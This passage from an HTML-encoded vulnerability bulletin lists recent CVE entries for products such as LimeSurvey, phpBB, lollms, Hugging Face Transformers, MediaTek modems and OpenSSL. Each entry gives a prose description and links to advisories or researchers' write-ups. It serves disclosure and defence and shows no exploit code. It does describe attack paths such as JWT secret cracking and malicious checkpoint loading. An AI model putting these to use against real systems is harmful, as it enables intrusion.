<a href=3D"https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4= w-qgx5" target=3D"_blank" rel=3D"noopener">https://github.com/axios/axios/s= ecurity/advisories/GHSA-3p68-rc4w-qgx5</a><br><a href=3D"https://github.com= /axios/axios/pull/10661" target=3D"_blank" rel=3D"noopener">https://github.= com/axios/axios/pull/10661</a><br><a href=3D"https://github.com/axios/axios= /commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df" target=3D"_blank" rel=3D"= noopener">https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d= 0f2d9e47f24df</a><br><a href=3D"https://datatracker.ietf.org/doc/html/rfc10= 34#section-3.1" target=3D"_blank" rel=3D"noopener">https://datatracker.ietf= .org/doc/html/rfc1034#section-3.1</a><br><a href=3D"https://datatracker.iet= f.org/doc/html/rfc3986#section-3.2.2" target=3D"_blank" rel=3D"noopener">ht= tps://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2</a><br><a href=3D= "https://github.com/axios/axios/releases/tag/v1.15.0" target=3D"_blank" rel= =3D"noopener">https://github.com/axios/axios/releases/tag/v1.15.0</a><br>= =C2=A0</td>
</tr>

<td class=3D"vendor-product">Semiconductor[.]Samsung[.]com -- Mobile Proces= sor &amp; Wearable Processor Exynos</td>
<td>An issue was discovered in Samsung Mobile Processor, Wearable Processor=
, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480,=
2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Mod=
em 5400. An out-of-bounds write occurs due to a mismatch between the TP-UDH=
I and UDL values when processing an SMS TP-UD packet.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-62818" target=3D= "_blank" rel=3D"noopener">CVE-2025-62818</a></td>

<a href=3D"https://semiconductor.samsung.com/support/quality-support/produc= t-security-updates/" target=3D"_blank" rel=3D"noopener">https://semiconduct= or.samsung.com/support/quality-support/product-security-updates/</a><br><a = href=3D"https://semiconductor.samsung.com/support/quality-support/product-s= ecurity-updates/cve-2025-62818/" target=3D"_blank" rel=3D"noopener">https:/= /semiconductor.samsung.com/support/quality-support/product-security-updates= /cve-2025-62818/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--LimeSurvey</td>
<td>A Reflected Cross-Site Scripting (XSS) affects LimeSurvey versions prio=
r to 6.15.11+250909, due to the lack of validation of gid parameter in getI= nstance() function in application/models/QuestionCreate.php. This allows an=
attacker to craft a malicious URL and compromise the logged in user.</td> <td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-63238" target=3D= "_blank" rel=3D"noopener">CVE-2025-63238</a></td>

<a href=3D"https://github.com/LimeSurvey/LimeSurvey/commit/80769a677dc82ddb= 1fcced4af19bd959d583208d" target=3D"_blank" rel=3D"noopener">https://github= .com/LimeSurvey/LimeSurvey/commit/80769a677dc82ddb1fcced4af19bd959d583208d<= /a><br><a href=3D"https://gist.github.com/masquerad3r/f913ab479e8de2ad71987= ef98a088fb5" target=3D"_blank" rel=3D"noopener">https://gist.github.com/mas= querad3r/f913ab479e8de2ad71987ef98a088fb5</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>An issue in JXL 9 Inch Car Android Double Din Player Android v12.0 allo=
ws attackers to force the infotainment system into accepting falsified GPS = signals as legitimate, resulting in the device reporting an incorrect or st= atic location.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-69515" target=3D= "_blank" rel=3D"noopener">CVE-2025-69515</a></td>

<a href=3D"http://jxl.com" target=3D"_blank" rel=3D"noopener">http://jxl.co= m</a><br><a href=3D"https://github.com/thorat-shubham/JXL_Infotainment_CVE-= 2025-69515/blob/main/README.md" target=3D"_blank" rel=3D"noopener">https://= github.com/thorat-shubham/JXL_Infotainment_CVE-2025-69515/blob/main/README.= md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>An issue was discovered in Kiamo before 8.4 allowing authenticated admi= nistrative attackers to execute arbitrary PHP code on the server.</td> <td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-70364" target=3D= "_blank" rel=3D"noopener">CVE-2025-70364</a></td>

<a href=3D"http://kiamo.com" target=3D"_blank" rel=3D"noopener">http://kiam= o.com</a><br><a href=3D"https://github.com/hackvens/blog.hackvens.fr/blob/m= ain/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md" target=3D"_blank"=
rel=3D"noopener">https://github.com/hackvens/blog.hackvens.fr/blob/main/_p= osts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Kiamo[.]com -- Kiamo</td>
<td>A stored cross-site scripting (XSS) vulnerability exists in Kiamo befor=
e 8.4 due to improper output encoding of user-supplied input in administrat= ive interfaces. An authenticated administrative user can inject arbitrary J= avaScript code that is executed in the browser of users viewing the affecte=
d pages.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-70365" target=3D= "_blank" rel=3D"noopener">CVE-2025-70365</a></td>

<a href=3D"http://kiamo.com" target=3D"_blank" rel=3D"noopener">http://kiam= o.com</a><br><a href=3D"https://github.com/hackvens/blog.hackvens.fr/blob/m= ain/_posts/advisories/2025-12-23-CVE-2025-70365-Kiamo.md" target=3D"_blank"=
rel=3D"noopener">https://github.com/hackvens/blog.hackvens.fr/blob/main/_p= osts/advisories/2025-12-23-CVE-2025-70365-Kiamo.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- Limesurvey</td>
<td>Cross Site Scripting vulnerability in Limesurvey v.6.15.20+251021 allow=
s a remote attacker to execute arbitrary code via the Box[title] and box[ur=
l] parameters.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-70797" target=3D= "_blank" rel=3D"noopener">CVE-2025-70797</a></td>

<a href=3D"https://gist.github.com/masquerad3r/772ddbfbd9fd95754f4873bcb202= 146d" target=3D"_blank" rel=3D"noopener">https://gist.github.com/masquerad3= r/772ddbfbd9fd95754f4873bcb202146d</a><br><a href=3D"https://github.com/Lim= eSurvey/LimeSurvey/pull/4356" target=3D"_blank" rel=3D"noopener">https://gi= thub.com/LimeSurvey/LimeSurvey/pull/4356</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows=
a local attacker to execute arbitrary code via the login function and the = authentication mechanism</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-70810" target=3D= "_blank" rel=3D"noopener">CVE-2025-70810</a></td>

<a href=3D"https://github.com/ariefibis" target=3D"_blank" rel=3D"noopener"= >https://github.com/ariefibis</a><br><a href=3D"https://www.linkedin.com/in= /mohammed-a-6a2548112/" target=3D"_blank" rel=3D"noopener">https://www.link= edin.com/in/mohammed-a-6a2548112/</a><br><a href=3D"https://gist.github.com= /ariefibis/80e306765c23d6fac1584dbb76822e30" target=3D"_blank" rel=3D"noope= ner">https://gist.github.com/ariefibis/80e306765c23d6fac1584dbb76822e30</a>= <br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>Cross Site Request Forgery vulnerability in Phpbb phbb3 v.3.3.15 allows=
a local attacker to execute arbitrary code via the Admin Control Panel ico=
n management functionality.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-70811" target=3D= "_blank" rel=3D"noopener">CVE-2025-70811</a></td>

<a href=3D"https://github.com/ariefibis" target=3D"_blank" rel=3D"noopener"= >https://github.com/ariefibis</a><br><a href=3D"https://www.linkedin.com/in= /mohammed-a-6a2548112/" target=3D"_blank" rel=3D"noopener">https://www.link= edin.com/in/mohammed-a-6a2548112/</a><br><a href=3D"https://github.com/arie= fibis/PHPBB/security/advisories/GHSA-56pv-xg3w-6822" target=3D"_blank" rel= =3D"noopener">https://github.com/ariefibis/PHPBB/security/advisories/GHSA-5= 6pv-xg3w-6822</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--Yaffa=C2=A0</td>
<td>yaffa v2.0.0 is vulnerable to Cross Site Scripting (XSS). An attacker c=
an inject malicious JavaScript into the "Add Account Group" function on the=
account-group page, allowing execution of arbitrary script in the context =
of users who view the affected page.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-70844" target=3D= "_blank" rel=3D"noopener">CVE-2025-70844</a></td>

<a href=3D"https://github.com/kantorge/yaffa" target=3D"_blank" rel=3D"noop= ener">https://github.com/kantorge/yaffa</a><br><a href=3D"https://github.co= m/J4cky1028/vulnerability-research/tree/main/CVE-2025-70844" target=3D"_bla= nk" rel=3D"noopener">https://github.com/J4cky1028/vulnerability-research/tr= ee/main/CVE-2025-70844</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>Dual DHCP DNS Server 8.01 improperly accepts and caches UDP DNS respons=
es without validating that the response originates from a legitimate config= ured upstream DNS server. The implementation matches responses primarily by=
TXID and inserts results into the cache, enabling a remote attacker to inj= ect forged responses and poison the DNS cache, potentially redirecting vict= ims to attacker-controlled destinations.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2025-71058" target=3D= "_blank" rel=3D"noopener">CVE-2025-71058</a></td>

<a href=3D"https://sourceforge.net/projects/dhcp-dns-server/" target=3D"_bl= ank" rel=3D"noopener">https://sourceforge.net/projects/dhcp-dns-server/</a>= <br><a href=3D"https://github.com/FPokerFace/Security-Advisory/tree/main/CV= E-2025-71058" target=3D"_blank" rel=3D"noopener">https://github.com/FPokerF= ace/Security-Advisory/tree/main/CVE-2025-71058</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Google--Android</td>
<td>In onHeaderDecoded of LocalImageResolver.java, there is a possible pers= istent denial of service due to resource exhaustion. This could lead to loc=
al denial of service with no additional execution privileges needed. User i= nteraction is not needed for exploitation.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-0049" target=3D"= _blank" rel=3D"noopener">CVE-2026-0049</a></td>

<a href=3D"https://source.android.com/docs/security/bulletin/2026/2026-04-0=
1" target=3D"_blank" rel=3D"noopener">https://source.android.com/docs/secur= ity/bulletin/2026/2026-04-01</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Pegasystems--Pega Robot Studio</td>
<td>An arbitrary file-write vulnerability in Pega Browser Extension (PBE) a= ffects Pega Robotic Automation version 22.1 or R25 users who are running au= tomations that work with Google Chrome or Microsoft Edge. A bad actor could=
create a website that includes malicious code. The vulnerability could occ=
ur if a Robot Runtime user navigates to the malicious website.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1078" target=3D"= _blank" rel=3D"noopener">CVE-2026-1078</a></td>

<a href=3D"https://support.pega.com/support-doc/pega-security-advisory-a26-= vulnerability-remediation-note" target=3D"_blank" rel=3D"noopener">https://= support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remed= iation-note</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Pegasystems--Pega Browser Extension (PBE)</td> <td>A native messaging host vulnerability in Pega Browser Extension (PBE) a= ffects users of all versions of Pega Robotic Automation who have installed = Pega Browser Extension. A bad actor could create a website that contains ma= licious code that targets PBE. The vulnerability could occur if a user navi= gates to this website. The malicious website could then present an unexpect=
ed message box.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1079" target=3D"= _blank" rel=3D"noopener">CVE-2026-1079</a></td>

<a href=3D"https://support.pega.com/support-doc/pega-security-advisory-a26-= vulnerability-remediation-note" target=3D"_blank" rel=3D"noopener">https://= support.pega.com/support-doc/pega-security-advisory-a26-vulnerability-remed= iation-note</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">parisneo--parisneo/lollms</td>
<td>In parisneo/lollms version 2.1.0, the application's session management =
is vulnerable to improper access control due to the use of a weak secret ke=
y for signing JSON Web Tokens (JWT). This vulnerability allows an attacker =
to perform an offline brute-force attack to recover the secret key. Once th=
e secret key is obtained, the attacker can forge administrative tokens by m= odifying the JWT payload and resigning it with the cracked secret. This ena= bles unauthorized users to escalate privileges, impersonate the administrat= or, and gain access to restricted endpoints. The issue is resolved in versi=
on 2.2.0.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1114" target=3D"= _blank" rel=3D"noopener">CVE-2026-1114</a></td>

<a href=3D"https://huntr.com/bounties/608b2a3b-2225-438e-9e61-ffbfdec2ed89"=
target=3D"_blank" rel=3D"noopener">https://huntr.com/bounties/608b2a3b-222= 5-438e-9e61-ffbfdec2ed89</a><br><a href=3D"https://github.com/parisneo/loll= ms/commit/a3b2b82b84d537a9da63e63a370a6a8ad55fed34" target=3D"_blank" rel= =3D"noopener">https://github.com/parisneo/lollms/commit/a3b2b82b84d537a9da6= 3e63a370a6a8ad55fed34</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">parisneo--parisneo/lollms</td>
<td>A Stored Cross-Site Scripting (XSS) vulnerability was identified in the=
social feature of parisneo/lollms, affecting the latest version prior to 2= .2.0. The vulnerability exists in the `create_post` function within `backen= d/routers/social/__init__.py`, where user-provided content is directly assi= gned to the `DBPost` model without sanitization. This allows attackers to i= nject and store malicious JavaScript, which is executed in the browsers of = users viewing the Home Feed, including administrators. This can lead to acc= ount takeover, session hijacking, and wormable attacks. The issue is resolv=
ed in version 2.2.0.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1115" target=3D"= _blank" rel=3D"noopener">CVE-2026-1115</a></td>

<a href=3D"https://huntr.com/bounties/099aa4fe-7165-4337-889c-3fb4f1aa71aa"=
target=3D"_blank" rel=3D"noopener">https://huntr.com/bounties/099aa4fe-716= 5-4337-889c-3fb4f1aa71aa</a><br><a href=3D"https://github.com/parisneo/loll= ms/commit/9767b882dbc893c388a286856beeaead69b8292a" target=3D"_blank" rel= =3D"noopener">https://github.com/parisneo/lollms/commit/9767b882dbc893c388a= 286856beeaead69b8292a</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">parisneo--parisneo/lollms</td>
<td>A Cross-site Scripting (XSS) vulnerability was identified in the `from_= dict` method of the `AppLollmsMessage` class in parisneo/lollms prior to ve= rsion 2.2.0. The vulnerability arises from the lack of sanitization or HTML=
encoding of the `content` field when deserializing user-provided data. Thi=
s allows an attacker to inject malicious HTML or JavaScript payloads, which=
can be executed in the context of another user's browser. Exploitation of = this vulnerability can lead to account takeover, session hijacking, or worm= able attacks.</td>
<td>2026-04-12</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1116" target=3D"= _blank" rel=3D"noopener">CVE-2026-1116</a></td>

<a href=3D"https://huntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e"=
target=3D"_blank" rel=3D"noopener">https://huntr.com/bounties/d3d076a7-2a5= 1-4e07-8d0e-91e28e76788e</a><br><a href=3D"https://github.com/parisneo/loll= ms/commit/9767b882dbc893c388a286856beeaead69b8292a" target=3D"_blank" rel= =3D"noopener">https://github.com/parisneo/lollms/commit/9767b882dbc893c388a= 286856beeaead69b8292a</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">parisneo--parisneo/lollms</td>
<td>An insufficient session expiration vulnerability exists in the latest v= ersion of parisneo/lollms. The application fails to invalidate active sessi= ons after a password reset, allowing an attacker to continue using an old s= ession token. This issue arises due to the absence of logic to reject reque= sts after a period of inactivity and the excessively long default session d= uration of 31 days. The vulnerability enables an attacker to maintain persi= stent access to a compromised account, even after the victim resets their p= assword.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1163" target=3D"= _blank" rel=3D"noopener">CVE-2026-1163</a></td>

<a href=3D"https://huntr.com/bounties/abe2d1c4-c21c-4608-8a8e-274565246a8b"=
target=3D"_blank" rel=3D"noopener">https://huntr.com/bounties/abe2d1c4-c21= c-4608-8a8e-274565246a8b</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Python Software Foundation--CPython</td>
<td>CR/LF bytes were not rejected by HTTP client proxy tunnel headers or ho= st.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1502" target=3D"= _blank" rel=3D"noopener">CVE-2026-1502</a></td>

<a href=3D"https://github.com/python/cpython/pull/146212" target=3D"_blank"=
rel=3D"noopener">https://github.com/python/cpython/pull/146212</a><br><a h= ref=3D"https://github.com/python/cpython/issues/146211" target=3D"_blank" r= el=3D"noopener">https://github.com/python/cpython/issues/146211</a><br><a h= ref=3D"https://mail.python.org/archives/list/security-announce@python.org/t= hread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/" target=3D"_blank" rel=3D"noopener"= >https://mail.python.org/archives/list/security-announce@python.org/thread/= 2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/</a><br><a href=3D"https://github.com/pyth= on/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69" target=3D"_blan=
k" rel=3D"noopener">https://github.com/python/cpython/commit/05ed7ce7ae9e17= c23a04085b2539fe6d6d3cef69</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">huggingface--huggingface/transformers</td>
<td>A vulnerability in the HuggingFace Transformers library, specifically i=
n the `Trainer` class, allows for arbitrary code execution. The `_load_rng_= state()` method in `src/transformers/trainer.py` at line 3059 calls `torch.= load()` without the `weights_only=3DTrue` parameter. This issue affects all=
versions of the library supporting `torch&gt;=3D2.2` when used with PyTorc=
h versions below 2.6, as the `safe_globals()` context manager provides no p= rotection in these versions. An attacker can exploit this vulnerability by = supplying a malicious checkpoint file, such as `rng_state.pth`, which can e= xecute arbitrary code when loaded. The issue is resolved in version v5.0.0r= c3.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1839" target=3D"= _blank" rel=3D"noopener">CVE-2026-1839</a></td>

<a href=3D"https://huntr.com/bounties/3c77bb97-e493-493d-9a88-c57f5c536485"=
target=3D"_blank" rel=3D"noopener">https://huntr.com/bounties/3c77bb97-e49= 3-493d-9a88-c57f5c536485</a><br><a href=3D"https://github.com/huggingface/t= ransformers/commit/03c8082ba4594c9b8d6fe190ca9bed0e5f8ca396" target=3D"_bla= nk" rel=3D"noopener">https://github.com/huggingface/transformers/commit/03c= 8082ba4594c9b8d6fe190ca9bed0e5f8ca396</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Unknown--Link Whisper Free</td>
<td>The Link Whisper Free WordPress plugin before 0.9.1 has a publicly acce= ssible REST endpoint that allows unauthenticated settings updates.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-1900" target=3D"= _blank" rel=3D"noopener">CVE-2026-1900</a></td>

<a href=3D"https://wpscan.com/vulnerability/dc10b627-7981-4c53-bc9d-e87418f= 3fcfc/" target=3D"_blank" rel=3D"noopener">https://wpscan.com/vulnerability= /dc10b627-7981-4c53-bc9d-e87418f3fcfc/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">MediaTek, Inc.--MediaTek chipset</td>
<td>In Modem, there is a possible system crash due to a logic error. This c= ould lead to remote denial of service, if a UE has connected to a rogue bas=
e station controlled by the attacker, with no additional execution privileg=
es needed. User interaction is not needed for exploitation. Patch ID: MOLY0= 1106496; Issue ID: MSV-4467.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20431" target=3D= "_blank" rel=3D"noopener">CVE-2026-20431</a></td>

<a href=3D"https://corp.mediatek.com/product-security-bulletin/April-2026" = target=3D"_blank" rel=3D"noopener">https://corp.mediatek.com/product-securi= ty-bulletin/April-2026</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">MediaTek, Inc.--MediaTek chipset</td>
<td>In Modem, there is a possible out of bounds write due to a missing boun=
ds check. This could lead to remote escalation of privilege, if a UE has co= nnected to a rogue base station controlled by the attacker, with no additio= nal execution privileges needed. User interaction is needed for exploitatio=
n. Patch ID: MOLY01406170; Issue ID: MSV-4461.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20432" target=3D= "_blank" rel=3D"noopener">CVE-2026-20432</a></td>

<a href=3D"https://corp.mediatek.com/product-security-bulletin/April-2026" = target=3D"_blank" rel=3D"noopener">https://corp.mediatek.com/product-securi= ty-bulletin/April-2026</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">MediaTek, Inc.--MediaTek chipset</td>
<td>In Modem, there is a possible out of bounds write due to a missing boun=
ds check. This could lead to remote escalation of privilege, if a UE has co= nnected to a rogue base station controlled by the attacker, with no additio= nal execution privileges needed. User interaction is needed for exploitatio=
n. Patch ID: MOLY01088681; Issue ID: MSV-4460.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20433" target=3D= "_blank" rel=3D"noopener">CVE-2026-20433</a></td>

<a href=3D"https://corp.mediatek.com/product-security-bulletin/April-2026" = target=3D"_blank" rel=3D"noopener">https://corp.mediatek.com/product-securi= ty-bulletin/April-2026</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">MediaTek, Inc.--MediaTek chipset</td>
<td>In sec boot, there is a possible out of bounds write due to an integer = overflow. This could lead to local denial of service, if an attacker has ph= ysical access to the device, with User execution privileges needed. User in= teraction is not needed for exploitation. Patch ID: ALPS09963054; Issue ID:=
MSV-3899.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-20446" target=3D= "_blank" rel=3D"noopener">CVE-2026-20446</a></td>

<a href=3D"https://corp.mediatek.com/product-security-bulletin/April-2026" = target=3D"_blank" rel=3D"noopener">https://corp.mediatek.com/product-securi= ty-bulletin/April-2026</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Rocket.Chat--Rocket.Chat</td>
<td>An open redirect vulnerability in Rocket.Chat versions prior to 8.4.0 a= llows users to be redirected to arbitrary URLs by manipulating parameters w= ithin a SAML endpoint.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22560" target=3D= "_blank" rel=3D"noopener">CVE-2026-22560</a></td>

<a href=3D"https://hackerone.com/reports/3418031" target=3D"_blank" rel=3D"= noopener">https://hackerone.com/reports/3418031</a><br><a href=3D"https://g= ithub.com/RocketChat/Rocket.Chat/pull/38994" target=3D"_blank" rel=3D"noope= ner">https://github.com/RocketChat/Rocket.Chat/pull/38994</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">The Wikimedia Foundation--Mediawiki - Wikilove=
Extension</td>
<td>Improper neutralization of alternate XSS syntax vulnerability in The Wi= kimedia Foundation Mediawiki - Wikilove Extension allows Cross-Site Scripti=
ng (XSS).The issue has been remediated on the `master` branch, and in the r= elease branches for MediaWiki versions 1.43, 1.44, and 1.45.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-22711" target=3D= "_blank" rel=3D"noopener">CVE-2026-22711</a></td>

<a href=3D"https://phabricator.wikimedia.org/T416502" target=3D"_blank" rel= =3D"noopener">https://phabricator.wikimedia.org/T416502</a><br><a href=3D"h= ttps://gerrit.wikimedia.org/r/q/Iab86209478a044504f5a6aea0d8c3d14f21c48b3" = target=3D"_blank" rel=3D"noopener">https://gerrit.wikimedia.org/r/q/Iab8620= 9478a044504f5a6aea0d8c3d14f21c48b3</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OpenPLC_V3--OpenPLC_V3</td>
<td>OpenPLC_V3 is vulnerable to an Initialization of a Resource with an Ins= ecure Default vulnerability which could allow an attacker to gain access to=
the system by bypassing authentication via an API.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28205" target=3D= "_blank" rel=3D"noopener">CVE-2026-28205</a></td>

<a href=3D"https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10" = target=3D"_blank" rel=3D"noopener">https://www.cisa.gov/news-events/ics-adv= isories/icsa-25-345-10</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OpenSSL--OpenSSL</td>
<td>Issue summary: Applications using AES-CFB128 encryption or decryption o=
n systems with AVX-512 and VAES support can trigger an out-of-bounds read o=
f up to 15 bytes when processing partial cipher blocks. Impact summary: Thi=
s out-of-bounds read may trigger a crash which leads to Denial of Service f=
or an application if the input buffer ends at a memory page boundary and th=
e following page is unmapped. There is no information disclosure as the ove= r-read bytes are not written to output. The vulnerable code path is only re= ached when processing partial blocks (when a previous call left an incomple=
te block and the current call provides fewer bytes than needed to complete = it). Additionally, the input buffer must be positioned at a page boundary w= ith the following page unmapped. CFB mode is not used in TLS/DTLS protocols=
, which use CBC, GCM, CCM, or ChaCha20-Poly1305 instead. For these reasons = the issue was assessed as Low severity according to our Security Policy. On=
ly x86-64 systems with AVX-512 and VAES instruction support are affected. O= ther architectures and systems without VAES support use different code path=
s that are not affected. OpenSSL FIPS module in 3.6 version is affected by = this issue.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28386" target=3D= "_blank" rel=3D"noopener">CVE-2026-28386</a></td>

<a href=3D"https://openssl-library.org/news/secadv/20260407.txt" target=3D"= _blank" rel=3D"noopener">OpenSSL Advisory</a><br><a href=3D"https://github.= com/openssl/openssl/commit/61f428a2fc6671ede184a19f71e6e495f0689621" target= =3D"_blank" rel=3D"noopener">3.6.2 git commit</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">OpenSSL--OpenSSL</td>
<td>Issue summary: An uncommon configuration of clients performing DANE TLS= A-based server authentication, when paired with uncommon server DANE TLSA r= ecords, may result in a use-after-free and/or double-free on the client sid=
e. Impact summary: A use after free can have a range of potential consequen= ces such as the corruption of valid data, crashes or execution of arbitrary=
code. However, the issue only affects clients that make use of TLSA record=
s with both the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) = certificate usage. By far the most common deployment of DANE is in SMTP MTA=
s for which RFC7672 recommends that clients treat as 'unusable' any TLSA re= cords that have the PKIX certificate usages. These SMTP (or other similar) = clients are not vulnerable to this issue. Conversely, any clients that supp= ort only the PKIX usages, and ignore the DANE-TA(2) usage are also not vuln= erable. The client would also need to be communicating with a server that p= ublishes a TLSA RRset with both types of TLSA records. No FIPS modules are = affected by this issue, the problem code is outside the FIPS module boundar= y.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28387" target=3D= "_blank" rel=3D"noopener">CVE-2026-28387</a></td>

<a href=3D"https://openssl-library.org/news/secadv/20260407.txt" target=3D"= _blank" rel=3D"noopener">OpenSSL Advisory</a><br><a href=3D"https://github.= com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe" target= =3D"_blank" rel=3D"noopener">3.6.2 git commit</a><br><a href=3D"https://git= hub.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3" ta= rget=3D"_blank" rel=3D"noopener">3.5.6 git commit</a><br><a href=3D"https:/= /github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b=
" target=3D"_blank" rel=3D"noopener">3.4.5 git commit</a><br><a href=3D"htt= ps://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339d= f0a7" target=3D"_blank" rel=3D"noopener">3.3.7 git commit</a><br><a href=3D= "https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16a= d7db8177" target=3D"_blank" rel=3D"noopener">3.0.20 git commit</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">OpenSSL--OpenSSL</td>
<td>Issue summary: When a delta CRL that contains a Delta CRL Indicator ext= ension is processed a NULL pointer dereference might happen if the required=
CRL Number extension is missing. Impact summary: A NULL pointer dereferenc=
e can trigger a crash which leads to a Denial of Service for an application=
. When CRL processing and delta CRL processing is enabled during X.509 cert= ificate verification, the delta CRL processing does not check whether the C=
RL Number extension is NULL before dereferencing it. When a malformed delta=
CRL file is being processed, this parameter can be NULL, causing a NULL po= inter dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTA=
S flag to be enabled in the verification context, the certificate being ver= ified to contain a freshestCRL extension or the base CRL to have the EXFLAG= _FRESHEST flag set, and an attacker to provide a malformed CRL to an applic= ation that processes it. The vulnerability is limited to Denial of Service = and cannot be escalated to achieve code execution or memory disclosure. For=
